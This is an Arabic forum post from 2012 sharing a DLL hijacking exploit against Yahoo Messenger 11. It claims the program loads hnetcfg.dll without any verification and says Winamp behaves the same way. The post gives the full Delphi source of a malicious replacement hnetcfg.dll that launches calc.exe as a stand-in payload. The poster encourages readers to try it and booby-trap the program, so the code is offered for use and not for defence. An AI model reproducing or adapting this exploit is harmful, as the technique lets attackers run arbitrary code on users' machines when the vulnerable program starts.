إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 2012-04-10, 08:32 PM
الصورة الرمزية صوتك يناديني
| صوتك يناديني  صوتك يناديني غير متواجد حالياً

 
تاريخ التسجيل: Dec 2011
المشاركات: 5,816
صوتك يناديني is on a distinguished road
افتراضي Yahoo 11 DllHajacking - By Coldzer0 - hnetcfg.dll

السلام عليكم ورحمه الله وبركاته

وانا احاول استخراج اى ثغره

Dll Hijacking

من اى برنامج قولت اجرب على :6: Yahoo 11 :6:

وطبعا معظم العالم يستخدم الياهو دا اذا مكنش العالم كله

وجدت البرنامج يحمل الملف hnetcfg.dll

بدون فحص للدوال او اى شئ وهنا تعتبر Dll Hijacking


نفس الونرار لا يفحص الدوال حتى يحدد اذا كان الملف المستخدم صحيح ام لا

المهم جرب ولغم وعيش


الكود بالدلفى

كود:
library hnetcfg;

{

A : Coldzer0 | AT4RE
D : 4/2012


}

uses
Windows,SysUtils;

function GetWinDir: string;
var
dir: array [0..MAX_PATH] of Char;
begin
GetWindowsDirectory(dir, MAX_PATH);
Result := StrPas(dir);
end;

function WindowsDirectory: string;
var
WinDir: PChar;
begin
WinDir := StrAlloc(MAX_PATH);
GetWindowsDirectory(WinDir, MAX_PATH);
Result := string(WinDir);
if Result[Length(Result)] '\' then
Result := Result + '\';
StrDispose(WinDir);
end;

function GetWindowsDirectory(var S: String): Boolean;
var
Len: Integer;
begin
Len := Windows.GetWindowsDirectory(nil, 0);
if Len > 0 then
begin
SetLength(S, Len);
Len := Windows.GetWindowsDirectory(PChar(S), Len);
SetLength(S, Len);
Result := Len > 0;
end else
Result := False;
end;

begin

WinExec(PAnsichar( PChar(GetWinDir)+ '\system32\calc.exe'),SW_NORMAL);

end.

لا اريد لا تقييم ولا اى شئ فقط دعوه لى ولوالداى بكل كلمات الشكر :32:

فى رعايه الله
__________________
قلبي " معك " لو شفت جسمي مع الناس...
ما غاب " طيفك "عن خيالي دقيقه ..
رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
11, coldzer0, dllhajacking, hnetcfgdll, yahoo



جديد مواضيع قسم حمايه الاجهزه
 
أدوات الموضوع
انواع عرض الموضوع


Yahoo 11 DllHajacking - By Coldzer0 - hnetcfg.dll




الساعة الآن 06:33 PM


Powered by vBulletin Copyright ©2000 - 2014